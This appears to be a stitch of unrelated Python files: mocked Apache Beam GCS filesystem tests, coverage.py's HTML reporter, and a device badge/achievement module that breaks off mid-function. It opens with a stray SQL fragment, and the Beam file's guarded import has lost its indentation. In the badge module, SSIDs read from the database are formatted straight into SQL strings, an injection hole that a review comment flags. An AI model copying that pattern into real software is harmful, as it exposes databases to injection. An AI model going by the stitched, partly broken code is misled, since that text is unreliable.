            "DEFERRED FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
|
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for GCS File System."""
from __future__ import absolute_import
import logging
import unittest
from builtins import zip
import mock
from apache_beam.io.filesystem import BeamIOError
from apache_beam.io.filesystem import FileMetadata
from apache_beam.options.pipeline_options import PipelineOptions
# Protect against environments where apitools library is not available.
# pylint: disable=wrong-import-order, wrong-import-position
try:
from apache_beam.io.gcp import gcsfilesystem
except ImportError:
gcsfilesystem = None
# pylint: enable=wrong-import-order, wrong-import-position
@unittest.skipIf(gcsfilesystem is None, 'GCP dependencies are not installed')
class GCSFileSystemTest(unittest.TestCase):
  # Tests use a MagicMock in place of GcsIO, so no network access happens.
  def setUp(self):
    # Each test gets a fresh GCSFileSystem built from default options.
    pipeline_options = PipelineOptions()
    self.fs = gcsfilesystem.GCSFileSystem(pipeline_options=pipeline_options)
  def test_scheme(self):
    self.assertEqual(self.fs.scheme(), 'gs')
    self.assertEqual(gcsfilesystem.GCSFileSystem.scheme(), 'gs')
  def test_join(self):
    # join normalizes slashes between base path and components.
    self.assertEqual('gs://bucket/path/to/file',
                     self.fs.join('gs://bucket/path', 'to', 'file'))
    self.assertEqual('gs://bucket/path/to/file',
                     self.fs.join('gs://bucket/path', 'to/file'))
    self.assertEqual('gs://bucket/path/to/file',
                     self.fs.join('gs://bucket/path', '/to/file'))
    self.assertEqual('gs://bucket/path/to/file',
                     self.fs.join('gs://bucket/path/', 'to', 'file'))
    self.assertEqual('gs://bucket/path/to/file',
                     self.fs.join('gs://bucket/path/', 'to/file'))
    self.assertEqual('gs://bucket/path/to/file',
                     self.fs.join('gs://bucket/path/', '/to/file'))
    # A base path without the gs:// scheme is rejected.
    with self.assertRaises(ValueError):
      self.fs.join('/bucket/path/', '/to/file')
  def test_split(self):
    self.assertEqual(('gs://foo/bar', 'baz'),
                     self.fs.split('gs://foo/bar/baz'))
    self.assertEqual(('gs://foo', ''),
                     self.fs.split('gs://foo/'))
    self.assertEqual(('gs://foo', ''),
                     self.fs.split('gs://foo'))
    with self.assertRaises(ValueError):
      self.fs.split('/no/gcs/prefix')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_match_multiples(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    # Replace the GcsIO factory so the filesystem talks to our mock.
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    # list_prefix returns a {path: size} mapping.
    gcsio_mock.list_prefix.return_value = {
        'gs://bucket/file1': 1,
        'gs://bucket/file2': 2
    }
    expected_results = set([
        FileMetadata('gs://bucket/file1', 1),
        FileMetadata('gs://bucket/file2', 2)
    ])
    match_result = self.fs.match(['gs://bucket/'])[0]
    self.assertEqual(
        set(match_result.metadata_list),
        expected_results)
    gcsio_mock.list_prefix.assert_called_once_with('gs://bucket/')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_match_multiples_limit(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    limit = 1
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    gcsio_mock.list_prefix.return_value = {
        'gs://bucket/file1': 1
    }
    expected_results = set([
        FileMetadata('gs://bucket/file1', 1)
    ])
    match_result = self.fs.match(['gs://bucket/'], [limit])[0]
    self.assertEqual(
        set(match_result.metadata_list),
        expected_results)
    # The per-pattern limit caps how many results are returned.
    self.assertEqual(
        len(match_result.metadata_list),
        limit)
    gcsio_mock.list_prefix.assert_called_once_with('gs://bucket/')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_match_multiples_error(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    exception = IOError('Failed')
    gcsio_mock.list_prefix.side_effect = exception
    # The underlying IOError is wrapped in a BeamIOError whose
    # exception_details records the failing pattern.
    with self.assertRaisesRegexp(BeamIOError,
                                 r'^Match operation failed') as error:
      self.fs.match(['gs://bucket/'])
    self.assertRegexpMatches(str(error.exception.exception_details),
                             r'gs://bucket/.*%s' % exception)
    gcsio_mock.list_prefix.assert_called_once_with('gs://bucket/')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_match_multiple_patterns(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    # One list_prefix response per pattern, in order.
    gcsio_mock.list_prefix.side_effect = [
        {'gs://bucket/file1': 1},
        {'gs://bucket/file2': 2},
    ]
    expected_results = [
        [FileMetadata('gs://bucket/file1', 1)],
        [FileMetadata('gs://bucket/file2', 2)]
    ]
    result = self.fs.match(['gs://bucket/file1*', 'gs://bucket/file2*'])
    self.assertEqual(
        [mr.metadata_list for mr in result],
        expected_results)
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_create(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    # Issue file create; it should open the path for writing.
    _ = self.fs.create('gs://bucket/from1', 'application/octet-stream')
    gcsio_mock.open.assert_called_once_with(
        'gs://bucket/from1', 'wb', mime_type='application/octet-stream')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_open(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    # Issue file open; it should open the path for reading.
    _ = self.fs.open('gs://bucket/from1', 'application/octet-stream')
    gcsio_mock.open.assert_called_once_with(
        'gs://bucket/from1', 'rb', mime_type='application/octet-stream')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_copy_file(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    sources = ['gs://bucket/from1']
    destinations = ['gs://bucket/to1']
    # Issue file copy
    self.fs.copy(sources, destinations)
    gcsio_mock.copy.assert_called_once_with(
        'gs://bucket/from1', 'gs://bucket/to1')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_copy_file_error(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    sources = ['gs://bucket/from1']
    destinations = ['gs://bucket/to1']
    exception = IOError('Failed')
    gcsio_mock.copy.side_effect = exception
    # Expected failure details for each (source, destination) pair.
    expected_results = {(s, d):exception for s, d in zip(sources, destinations)}
    # Issue batch copy.
    with self.assertRaisesRegexp(BeamIOError,
                                 r'^Copy operation failed') as error:
      self.fs.copy(sources, destinations)
    self.assertEqual(error.exception.exception_details, expected_results)
    gcsio_mock.copy.assert_called_once_with(
        'gs://bucket/from1', 'gs://bucket/to1')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_copy_tree(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    # Trailing-slash paths are treated as directories and use copytree.
    sources = ['gs://bucket1/']
    destinations = ['gs://bucket2/']
    # Issue directory copy
    self.fs.copy(sources, destinations)
    gcsio_mock.copytree.assert_called_once_with(
        'gs://bucket1/', 'gs://bucket2/')
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_rename(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    sources = [
        'gs://bucket/from1',
        'gs://bucket/from2',
        'gs://bucket/from3',
    ]
    destinations = [
        'gs://bucket/to1',
        'gs://bucket/to2',
        'gs://bucket/to3',
    ]
    # Batch results are (source, destination, error) / (path, error) tuples;
    # None means the individual operation succeeded.
    gcsio_mock.copy_batch.side_effect = [[
        ('gs://bucket/from1', 'gs://bucket/to1', None),
        ('gs://bucket/from2', 'gs://bucket/to2', None),
        ('gs://bucket/from3', 'gs://bucket/to3', None),
    ]]
    gcsio_mock.delete_batch.side_effect = [[
        ('gs://bucket/from1', None),
        ('gs://bucket/from2', None),
        ('gs://bucket/from3', None),
    ]]
    # Issue batch rename.
    self.fs.rename(sources, destinations)
    # Rename is implemented as copy_batch followed by delete_batch.
    gcsio_mock.copy_batch.assert_called_once_with([
        ('gs://bucket/from1', 'gs://bucket/to1'),
        ('gs://bucket/from2', 'gs://bucket/to2'),
        ('gs://bucket/from3', 'gs://bucket/to3'),
    ])
    gcsio_mock.delete_batch.assert_called_once_with([
        'gs://bucket/from1',
        'gs://bucket/from2',
        'gs://bucket/from3',
    ])
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_rename_error(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    sources = [
        'gs://bucket/from1',
        'gs://bucket/from2',
        'gs://bucket/from3',
    ]
    destinations = [
        'gs://bucket/to1',
        'gs://bucket/to2',
        'gs://bucket/to3',
    ]
    exception = IOError('Failed')
    # Copies succeed but every delete fails.
    gcsio_mock.delete_batch.side_effect = [[(f, exception) for f in sources]]
    gcsio_mock.copy_batch.side_effect = [[
        ('gs://bucket/from1', 'gs://bucket/to1', None),
        ('gs://bucket/from2', 'gs://bucket/to2', None),
        ('gs://bucket/from3', 'gs://bucket/to3', None),
    ]]
    # Expected failure details for each (source, destination) pair.
    expected_results = {(s, d):exception for s, d in zip(sources, destinations)}
    # Issue batch rename.
    with self.assertRaisesRegexp(BeamIOError,
                                 r'^Rename operation failed') as error:
      self.fs.rename(sources, destinations)
    self.assertEqual(error.exception.exception_details, expected_results)
    gcsio_mock.copy_batch.assert_called_once_with([
        ('gs://bucket/from1', 'gs://bucket/to1'),
        ('gs://bucket/from2', 'gs://bucket/to2'),
        ('gs://bucket/from3', 'gs://bucket/to3'),
    ])
    gcsio_mock.delete_batch.assert_called_once_with([
        'gs://bucket/from1',
        'gs://bucket/from2',
        'gs://bucket/from3',
    ])
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_delete(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    gcsio_mock.size.return_value = 0
    files = [
        'gs://bucket/from1',
        'gs://bucket/from2',
        'gs://bucket/from3',
    ]
    # Issue batch delete.
    self.fs.delete(files)
    gcsio_mock.delete_batch.assert_called()
  @mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
  def test_delete_error(self, mock_gcsio):
    # Prepare mocks.
    gcsio_mock = mock.MagicMock()
    gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
    exception = IOError('Failed')
    gcsio_mock.delete_batch.side_effect = exception
    gcsio_mock.size.return_value = 0
    files = [
        'gs://bucket/from1',
        'gs://bucket/from2',
        'gs://bucket/from3',
    ]
    # Every file is expected to be reported as failed.
    expected_results = {f:exception for f in files}
    # Issue batch delete.
    with self.assertRaisesRegexp(BeamIOError,
                                 r'^Delete operation failed') as error:
      self.fs.delete(files)
    self.assertEqual(error.exception.exception_details, expected_results)
    gcsio_mock.delete_batch.assert_called()
if __name__ == '__main__':
  # Show INFO-level log output when the test module is run directly.
  logging.getLogger().setLevel(logging.INFO)
  unittest.main()
|
|
"""HTML reporting for Coverage."""
import os, re, shutil, sys
import coverage
from coverage.backward import pickle
from coverage.misc import CoverageException, Hasher
from coverage.phystokens import source_token_lines, source_encoding
from coverage.report import Reporter
from coverage.results import Numbers
from coverage.templite import Templite
# Static files are looked for in a list of places.  Earlier entries win:
# `data_filename` returns the first match it finds.
STATIC_PATH = [
    # The place Debian puts system Javascript libraries.
    "/usr/share/javascript",
    # Our htmlfiles directory.
    os.path.join(os.path.dirname(__file__), "htmlfiles"),
]
def data_filename(fname, pkgdir=""):
    """Return the path to a data file of ours.

    The file is searched for on `STATIC_PATH`, and the first place it's found,
    is returned.

    Each directory in `STATIC_PATH` is searched as-is, and also, if `pkgdir`
    is provided, at that subdirectory.

    """
    for static_dir in STATIC_PATH:
        # Within one directory, the bare name is preferred over the
        # pkgdir-qualified one.
        candidates = [os.path.join(static_dir, fname)]
        if pkgdir:
            candidates.append(os.path.join(static_dir, pkgdir, fname))
        for candidate in candidates:
            if os.path.exists(candidate):
                return candidate
    raise CoverageException("Couldn't find static file %r" % fname)
def data(fname):
    """Return the contents of a data file of ours.

    `fname` is located via `data_filename`, so it is searched for along
    `STATIC_PATH`.

    """
    # try/finally rather than a `with` block, matching the rest of this
    # module's file handling.
    f = open(data_filename(fname))
    try:
        return f.read()
    finally:
        f.close()
class HtmlReporter(Reporter):
    """HTML reporting."""
    # These files will be copied from the htmlfiles dir to the output dir.
    # Each entry is (filename, pkgdir) as understood by `data_filename`.
    STATIC_FILES = [
            ("style.css", ""),
            ("jquery.min.js", "jquery"),
            ("jquery.hotkeys.js", "jquery-hotkeys"),
            ("jquery.isonscreen.js", "jquery-isonscreen"),
            ("jquery.tablesorter.min.js", "jquery-tablesorter"),
            ("coverage_html.js", ""),
            ("keybd_closed.png", ""),
            ("keybd_open.png", ""),
        ]
    def __init__(self, cov, config):
        super(HtmlReporter, self).__init__(cov, config)
        self.directory = None
        # Values available to every rendered template.
        self.template_globals = {
            'escape': escape,
            'title': self.config.html_title,
            '__url__': coverage.__url__,
            '__version__': coverage.__version__,
            }
        self.source_tmpl = Templite(
            data("pyfile.html"), self.template_globals
            )
        self.coverage = cov
        self.files = []
        self.arcs = self.coverage.data.has_arcs()
        # Incremental-reporting state: hashes of previously reported files.
        self.status = HtmlStatus()
        self.extra_css = None
        self.totals = Numbers()
    def report(self, morfs):
        """Generate an HTML report for `morfs`.

        `morfs` is a list of modules or filenames.

        Returns the aggregate percent covered.

        """
        assert self.config.html_dir, "must give a directory for html reporting"
        # Read the status data.
        self.status.read(self.config.html_dir)
        # Check that this run used the same settings as the last run.
        m = Hasher()
        m.update(self.config)
        these_settings = m.digest()
        if self.status.settings_hash() != these_settings:
            # Settings changed: discard the old status so every file is
            # re-reported.
            self.status.reset()
            self.status.set_settings_hash(these_settings)
        # The user may have extra CSS they want copied.
        if self.config.extra_css:
            self.extra_css = os.path.basename(self.config.extra_css)
        # Process all the files.
        self.report_files(self.html_file, morfs, self.config.html_dir)
        if not self.files:
            raise CoverageException("No data to report.")
        # Write the index file.
        self.index_file()
        self.make_local_static_report_files()
        return self.totals.pc_covered
    def make_local_static_report_files(self):
        """Make local instances of static files for HTML report."""
        # The files we provide must always be copied.
        for static, pkgdir in self.STATIC_FILES:
            shutil.copyfile(
                data_filename(static, pkgdir),
                os.path.join(self.directory, static)
                )
        # The user may have extra CSS they want copied.
        if self.extra_css:
            shutil.copyfile(
                self.config.extra_css,
                os.path.join(self.directory, self.extra_css)
                )
    def write_html(self, fname, html):
        """Write `html` to `fname`, properly encoded."""
        fout = open(fname, "wb")
        try:
            # xmlcharrefreplace turns non-ASCII characters into numeric
            # character references, keeping the output pure ASCII.
            fout.write(html.encode('ascii', 'xmlcharrefreplace'))
        finally:
            fout.close()
    def file_hash(self, source, cu):
        """Compute a hash that changes if the file needs to be re-reported."""
        # Hash both the source text and the coverage data for the file.
        m = Hasher()
        m.update(source)
        self.coverage.data.add_to_hash(cu.filename, m)
        return m.digest()
    def html_file(self, cu, analysis):
        """Generate an HTML file for one source file."""
        source_file = cu.source_file()
        try:
            source = source_file.read()
        finally:
            source_file.close()
        # Find out if the file on disk is already correct.
        flat_rootname = cu.flat_rootname()
        this_hash = self.file_hash(source, cu)
        that_hash = self.status.file_hash(flat_rootname)
        if this_hash == that_hash:
            # Nothing has changed to require the file to be reported again.
            self.files.append(self.status.index_info(flat_rootname))
            return
        self.status.set_file_hash(flat_rootname, this_hash)
        # If need be, determine the encoding of the source file. We use it
        # later to properly write the HTML.
        if sys.version_info < (3, 0):
            encoding = source_encoding(source)
            # Some UTF8 files have the dreaded UTF8 BOM. If so, junk it.
            if encoding.startswith("utf-8") and source[:3] == "\xef\xbb\xbf":
                source = source[3:]
                encoding = "utf-8"
        # Get the numbers for this file.
        nums = analysis.numbers
        if self.arcs:
            missing_branch_arcs = analysis.missing_branch_arcs()
        # These classes determine which lines are highlighted by default.
        c_run = "run hide_run"
        c_exc = "exc"
        c_mis = "mis"
        c_par = "par " + c_run
        lines = []
        for lineno, line in enumerate(source_token_lines(source)):
            lineno += 1     # 1-based line numbers.
            # Figure out how to mark this line.
            line_class = []
            annotate_html = ""
            annotate_title = ""
            if lineno in analysis.statements:
                line_class.append("stm")
            if lineno in analysis.excluded:
                line_class.append(c_exc)
            elif lineno in analysis.missing:
                line_class.append(c_mis)
            elif self.arcs and lineno in missing_branch_arcs:
                # Partially-executed branch: annotate with the line numbers
                # that were never jumped to.
                line_class.append(c_par)
                annlines = []
                for b in missing_branch_arcs[lineno]:
                    if b < 0:
                        annlines.append("exit")
                    else:
                        annlines.append(str(b))
                annotate_html = "&nbsp;&nbsp; ".join(annlines)
                if len(annlines) > 1:
                    annotate_title = "no jumps to these line numbers"
                elif len(annlines) == 1:
                    annotate_title = "no jump to this line number"
            elif lineno in analysis.statements:
                line_class.append(c_run)
            # Build the HTML for the line
            html = []
            for tok_type, tok_text in line:
                if tok_type == "ws":
                    html.append(escape(tok_text))
                else:
                    tok_html = escape(tok_text) or '&nbsp;'
                    html.append(
                        "<span class='%s'>%s</span>" % (tok_type, tok_html)
                        )
            lines.append({
                'html': ''.join(html),
                'number': lineno,
                'class': ' '.join(line_class) or "pln",
                'annotate': annotate_html,
                'annotate_title': annotate_title,
            })
        # Write the HTML page for this file.
        html = spaceless(self.source_tmpl.render({
            'c_exc': c_exc, 'c_mis': c_mis, 'c_par': c_par, 'c_run': c_run,
            'arcs': self.arcs, 'extra_css': self.extra_css,
            'cu': cu, 'nums': nums, 'lines': lines,
        }))
        if sys.version_info < (3, 0):
            html = html.decode(encoding)
        html_filename = flat_rootname + ".html"
        html_path = os.path.join(self.directory, html_filename)
        self.write_html(html_path, html)
        # Save this file's information for the index file.
        index_info = {
            'nums': nums,
            'html_filename': html_filename,
            'name': cu.name,
            }
        self.files.append(index_info)
        self.status.set_index_info(flat_rootname, index_info)
    def index_file(self):
        """Write the index.html file for this report."""
        index_tmpl = Templite(
            data("index.html"), self.template_globals
            )
        # Summing Numbers objects aggregates the per-file statistics.
        self.totals = sum([f['nums'] for f in self.files])
        html = index_tmpl.render({
            'arcs': self.arcs,
            'extra_css': self.extra_css,
            'files': self.files,
            'totals': self.totals,
        })
        if sys.version_info < (3, 0):
            html = html.decode("utf-8")
        self.write_html(
            os.path.join(self.directory, "index.html"),
            html
            )
        # Write the latest hashes for next time.
        self.status.write(self.directory)
class HtmlStatus(object):
    """The status information we keep to support incremental reporting."""

    STATUS_FILE = "status.dat"
    STATUS_FORMAT = 1

    def __init__(self):
        self.reset()

    def reset(self):
        """Forget everything: no settings hash, no per-file records."""
        self.settings = ''
        self.files = {}

    def read(self, directory):
        """Load the status left by a previous run in `directory`, if usable."""
        status = None
        try:
            with open(os.path.join(directory, self.STATUS_FILE), "rb") as fstatus:
                status = pickle.load(fstatus)
        except (IOError, ValueError):
            usable = False
        else:
            # Only trust data written in the same format by the same
            # coverage version.
            usable = (
                status['format'] == self.STATUS_FORMAT
                and status['version'] == coverage.__version__
            )
        if usable:
            self.files = status['files']
            self.settings = status['settings']
        else:
            self.reset()

    def write(self, directory):
        """Pickle the current status into `directory`."""
        payload = {
            'format': self.STATUS_FORMAT,
            'version': coverage.__version__,
            'settings': self.settings,
            'files': self.files,
        }
        fout = open(os.path.join(directory, self.STATUS_FILE), "wb")
        try:
            pickle.dump(payload, fout)
        finally:
            fout.close()

    def settings_hash(self):
        """Get the hash of the coverage.py settings."""
        return self.settings

    def set_settings_hash(self, settings):
        """Set the hash of the coverage.py settings."""
        self.settings = settings

    def file_hash(self, fname):
        """Get the hash of `fname`'s contents ('' when unknown)."""
        return self.files.get(fname, {}).get('hash', '')

    def set_file_hash(self, fname, val):
        """Set the hash of `fname`'s contents."""
        entry = self.files.setdefault(fname, {})
        entry['hash'] = val

    def index_info(self, fname):
        """Get the information for index.html for `fname`."""
        return self.files.get(fname, {}).get('index', {})

    def set_index_info(self, fname, info):
        """Set the information for index.html for `fname`."""
        entry = self.files.setdefault(fname, {})
        entry['index'] = info
# Helpers for templates and generating HTML
def escape(t):
    """HTML-escape the text in `t`.

    The entity replacement targets had been mangled into no-ops (e.g.
    ``.replace("&", "&")``); this restores the real HTML entities and the
    ``&nbsp;`` space-run handling so indentation survives in the browser.
    """
    return (t
        # Convert HTML special chars into HTML entities.
        .replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
        .replace("'", "&#39;").replace('"', "&quot;")
        # Convert runs of spaces: "......" -> "&nbsp;.&nbsp;.&nbsp;."
        .replace("  ", "&nbsp; ")
        # To deal with odd-length runs, convert the final pair of spaces
        # so that "....." -> "&nbsp;.&nbsp;&nbsp;."
        .replace("  ", " &nbsp;")
        )
def spaceless(html):
    """Collapse the whitespace between a closing tag and a following ``<p``.

    Nicely-formatted templates leave runs of blank space in the rendered
    output; squeeze each ``>   <p`` junction down to ``>\\n<p``.
    """
    return re.sub(r">\s+<p ", ">\n<p ", html)
|
|
import datetime
import easydict
import logging
import middleware
import time
from errors import UnknownAchievementHandler
@middleware.unsafe()
def count_based_badge(achievement_id, config, db, params):
    """Award a badge from the total row count across the configured tables."""
    logging.debug("count_based_badge @ {}/{}".format(params.device_id, achievement_id))
    sql = get_count_query(config.tables, "%(device_id)s") + ";"
    return query_based_badge(sql, config, db, params)
@middleware.unsafe()
def proc_based_badge(achievement_id, config, db, params):
    """Award a badge from this device's share of the overall row count."""
    logging.debug("proc_based_badge @ {}/{}".format(params.device_id, achievement_id))
    device_count = get_count_query(config.tables, "%(device_id)s")
    overall_count = get_count_query(config.tables, None)
    # Achievement unlocked: Triple nested SELECT
    sql = "SELECT {} / {} AS 'result';".format(device_count, overall_count)
    return query_based_badge(sql, config, db, params)
@middleware.unsafe()
def wifi_security_special_badge(achievement_id, config, db, params):
    """Badge for the share of this device's networks lacking WPA security."""
    logging.debug("wifi_security_special_badge @ {}/{}".format(params.device_id, achievement_id))
    # First fetch every SSID this device has seen.
    ssid_query = "SELECT DISTINCT ssid FROM {} WHERE device_id = %(device_id)s;"
    db.execute(ssid_query.format(config.ssid_table), {"device_id": params.device_id})
    # NOTE(review): SSIDs are spliced into the SQL below by string
    # formatting; an SSID containing a quote could break or inject into
    # the query.
    ssids = ",".join(["'{}'".format(record["ssid"]) for record in db.fetchall()])
    data = config.data_table
    numerator = ("(SELECT count(*) FROM {} "
                 "WHERE device_id = %(device_id)s "
                 "AND ssid IN ({}) "
                 "AND security NOT LIKE '%%WPA%%')").format(data, ssids)
    denominator = ("(SELECT count(*) FROM {} "
                   "WHERE device_id = %(device_id)s "
                   "AND ssid IN ({}))").format(data, ssids)
    final_query = "SELECT 1 - {} / {} AS 'result';".format(numerator, denominator)
    return query_based_badge(final_query, config, db, params)
@middleware.unsafe()
def wifi_funny_special_badge(achievement_id, config, db, params):
    """Award a badge for each configured keyword seen inside an SSID."""
    logging.debug("wifi_funny_special_badge @ {}/{}".format(params.device_id, achievement_id))
    template = ("(SELECT count(*) FROM {} "
                "WHERE device_id = %(device_id)s "
                "AND ssid LIKE '%%{}%%')")
    # One aliased count column per badge keyword, all in a single query.
    selects = ["{} AS '{}'".format(template.format(config.table, keyword), keyword)
               for keyword in config.badges]
    db.execute("SELECT " + ", ".join(selects) + ";", {'device_id': params.device_id})
    return [{"badge": config.badges[keyword],
             "value": keyword}
            for keyword, hits in db.fetchone().items()
            if hits > 0]
@middleware.unsafe()
def network_percent_data_badge(achievement_id, config, db, params):
    """Badge a device that is predominantly a data sender or receiver."""
    logging.debug("network_percent_data_badge @ {}/{}".format(params.device_id, achievement_id))
    query = ("SELECT sum(double_received_bytes) AS data_received, sum(double_sent_bytes) AS data_sent "
             "FROM {} WHERE device_id = %(device_id)s".format(config.table))
    db.execute(query + ";", {'device_id': params.device_id})
    row = db.fetchone()
    received = row['data_received']
    sent = row['data_sent']
    total = received + sent
    # Sender is checked first, so it wins when both thresholds are met.
    if sent >= total * config.thresholds.sender:
        return {"badge": config.badges.sender,
                "ratio": sent / total,
                "threshold": config.thresholds.sender}
    if received >= total * config.thresholds.receiver:
        return {"badge": config.badges.receiver,
                "ratio": received / total,
                "threshold": config.thresholds.receiver}
    return None
@middleware.unsafe()
def battery_mean_usage_badge(achievement_id, config, db, params):
    """Badge devices whose average battery usage is notably low or high."""
    logging.debug("battery_mean_usage_badge @ {}/{}".format(params.device_id, achievement_id))
    query_params = {'device_id': params.device_id}
    # Average number of charge events per day.
    charge_times_subquery = ("SELECT count(*) as charge_times "
                             "FROM {table} WHERE device_id = %(device_id)s "
                             "GROUP BY DATE(FROM_UNIXTIME(timestamp / 1000))").format(table=config.tables.charges)
    db.execute("SELECT avg(charge_times) AS ct FROM ({}) AS t;".format(charge_times_subquery), query_params)
    charge_times = db.fetchone()['ct']
    # Average battery level drop per day.
    discharge_level_subquery = ("SELECT avg(battery_start - battery_end) AS discharge_level "
                                "FROM {table} WHERE device_id = %(device_id)s "
                                "GROUP BY DATE(FROM_UNIXTIME(timestamp / 1000))").format(table=config.tables.discharges)
    db.execute("SELECT avg(discharge_level) AS dl FROM ({}) AS t;".format(discharge_level_subquery), query_params)
    discharge_level = db.fetchone()['dl']
    thresholds = config.thresholds
    if charge_times <= thresholds.low.charge_times and discharge_level <= thresholds.low.discharge_level:
        return {'badge': config.badges.low}
    if charge_times >= thresholds.high.charge_times and discharge_level >= thresholds.high.discharge_level:
        return {'badge': config.badges.high}
    return None
# Generic *_based_badge handler.
def query_based_badge(query, config, db, params):
    """Map the single 'result' value of `query` onto a threshold ladder.

    Walks (badge, threshold) pairs in order; the highest threshold not
    exceeding the result wins.  Returns None below the first threshold,
    otherwise a dict with the badge, the raw value, and the next
    threshold to reach (None once the ladder is exhausted).
    """
    db.execute(query, {'device_id': params.device_id})
    count = db.fetchone()['result']
    thresholds = config.thresholds
    badges = config.badges
    badge = None
    next_badge_at = thresholds[0]
    for candidate, threshold in zip(badges, thresholds):
        if count < threshold:
            next_badge_at = threshold
            break
        badge = candidate
    if count >= thresholds[-1]:
        next_badge_at = None
    if badge is None:
        return None
    return {"badge": badge,
            "value": count,
            "next_badge_at": next_badge_at}
def get_count_query(tables, device_id):
    """Build a subquery summing row counts over `tables`.

    `device_id` may be a literal or a placeholder string; when falsy the
    counts are not filtered by device.
    """
    base = "SELECT count(*) FROM {table}"
    if device_id:
        base += " WHERE device_id = {}".format(device_id)
    parts = ["({})".format(base.format(table=t)) for t in tables]
    return "(SELECT " + " + ".join(parts) + " AS 'result')"
@middleware.unsafe()
def time_based_badge(achievement_id, config, db, params):
    """Award a badge based on how long ago the device was first seen.

    Mirrors query_based_badge: walks the (badge, threshold) ladder and
    reports the next threshold as an absolute unix time, or None once the
    ladder is exhausted.  Returns None when no threshold is reached yet —
    the original referenced `badge` unbound in that case and raised
    UnboundLocalError.
    """
    logging.debug("time_based_badge @ {}/{}".format(params.device_id, achievement_id))
    query = get_time_query(config.tables, "%(device_id)s") + ";"
    db.execute(query, {'device_id': params.device_id})
    timestamp = db.fetchone()['timestamp'] / 1000  # It's a kind of magic
    now = datetime.datetime.now()  # TODO now() or utcnow()
    timedelta = now - datetime.datetime.fromtimestamp(timestamp)  # TODO fromtimestamp(t) or fromutctimestamp(t)
    thresholds = config.thresholds
    badges = config.badges
    badge = None
    next_badge_at = None
    for (b, t) in zip(badges, thresholds):
        if timedelta >= t:
            badge = b
        else:
            next_badge_at = (now - timedelta + t).timestamp()
            break
    if timedelta >= thresholds[-1]:
        next_badge_at = None
    if badge is None:
        return None
    return {"badge": badge,
            "value": timestamp,
            "next_badge_at": next_badge_at}
def get_time_query(tables, device_id):
    """Build a query for the earliest timestamp across `tables`.

    `device_id` may be a literal or a placeholder string; when falsy no
    device filter is applied.
    """
    base = "SELECT timestamp FROM {table}"
    if device_id:
        base += " WHERE device_id={}".format(device_id)
    base += " ORDER BY timestamp ASC LIMIT 1"
    parts = ["({})".format(base.format(table=t)) for t in tables]
    return "SELECT min(timestamp) as timestamp from (" + " UNION ALL ".join(parts) + ") as t"
@middleware.unsafe()
def count_based_place(achievement_id, config, db, params):
    """This device's position within the count-based ranking."""
    device_id = params.device_id
    logging.debug("count_based_place @ {}/{}".format(device_id, achievement_id))
    ranking = count_based_ranking(achievement_id, config, db, params)
    return index_of(ranking, device_id)
@middleware.unsafe()
def proc_based_place(achievement_id, config, db, params):
    """This device's position within the percentage-based ranking."""
    device_id = params.device_id
    logging.debug("proc_based_place @ {}/{}".format(device_id, achievement_id))
    ranking = proc_based_ranking(achievement_id, config, db, params)
    return index_of(ranking, device_id)
@middleware.unsafe()
def time_based_place(achievement_id, config, db, params):
    """This device's position within the time-based ranking."""
    device_id = params.device_id
